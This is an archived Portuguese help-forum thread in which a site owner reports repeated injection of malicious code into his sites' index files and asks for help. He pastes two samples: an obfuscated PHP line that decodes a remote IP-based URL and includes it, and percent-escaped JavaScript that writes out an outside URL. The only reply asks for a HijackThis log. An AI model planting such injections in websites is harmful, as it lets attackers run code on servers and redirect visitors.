Ir para conteúdo

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

Seinet

[Arquivado] Sites infectados

Recommended Posts

Olá, estou tendo um problema em algums sites, quase todo dia, normalmente de 3 em 3 dias os arquivos index do site são alterados tendo incluidos iframes ou sites maliciosos. Vou postar um exemplo

 

<? $g=base64_decode('aHR0cDovLzk0LjI0Ny4zLjE4Ni9pZC9pbmRleC5waHA='); include ($g); ?>

 

outro exemplo

 

<script>document.write(unescape('%68')+unescape('%74%74')+unescape('%70')+unescape('%3A')+unescape('%2F%2F')+unescape('%63%72%6F%73')+unescape('%73%72%65')+unescape('%64%2E%63%6E')+unescape('%2F%75%6E')+unescape('%70')+unescape('%61')+unescape('%63%6B')+unescape('%2F%69%6E')+unescape('%64%65%78')+unescape('%2E%70%68%70')+'');</script>

 

e tem varios exemplos que ele gera Iframes direcionando para um determinado site, e ele tambêm altera meu htacess dando permisão para um site.

 

Alguem ja passou por isso, sabe do que se trata ou como corrigir?

Compartilhar este post


Link para o post
Compartilhar em outros sites
Olá, estou tendo um problema em algums sites, quase todo dia, normalmente de 3 em 3 dias os arquivos index do site são alterados tendo incluidos iframes ou sites maliciosos. Vou postar um exemplo

 

<? $g=base64_decode('aHR0cDovLzk0LjI0Ny4zLjE4Ni9pZC9pbmRleC5waHA='); include ($g); ?>

 

outro exemplo

 

<script>document.write(unescape('%68')+unescape('%74%74')+unescape('%70')+unescape('%3A')+unescape('%2F%2F')+unescape('%63%72%6F%73')+unescape('%73%72%65')+unescape('%64%2E%63%6E')+unescape('%2F%75%6E')+unescape('%70')+unescape('%61')+unescape('%63%6B')+unescape('%2F%69%6E')+unescape('%64%65%78')+unescape('%2E%70%68%70')+'');</script>

 

e tem varios exemplos que ele gera Iframes direcionando para um determinado site, e ele tambêm altera meu htacess dando permisão para um site.

 

Alguem ja passou por isso, sabe do que se trata ou como corrigir?

----------------------

Opa! Seinet

Bom Dia!

 

<!> Poste o log do HijackThis,segundo este Tutorial:

 

< Regra Nº 02 - Utilizando O Hijackthis. LEIA ANTES DE POSTAR! >

 

Abraços!

Compartilhar este post


Link para o post
Compartilhar em outros sites

Tópico Arquivado

 

Como o autor não respondeu por mais de 30 dias, o tópico foi arquivado.

 

Caso você seja o autor do tópico e quer reabrir, envie uma mensagem privada para um moderador da área juntamente com o link para este tópico e explique o motivo da reabertura.

Compartilhar este post


Link para o post
Compartilhar em outros sites

×

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.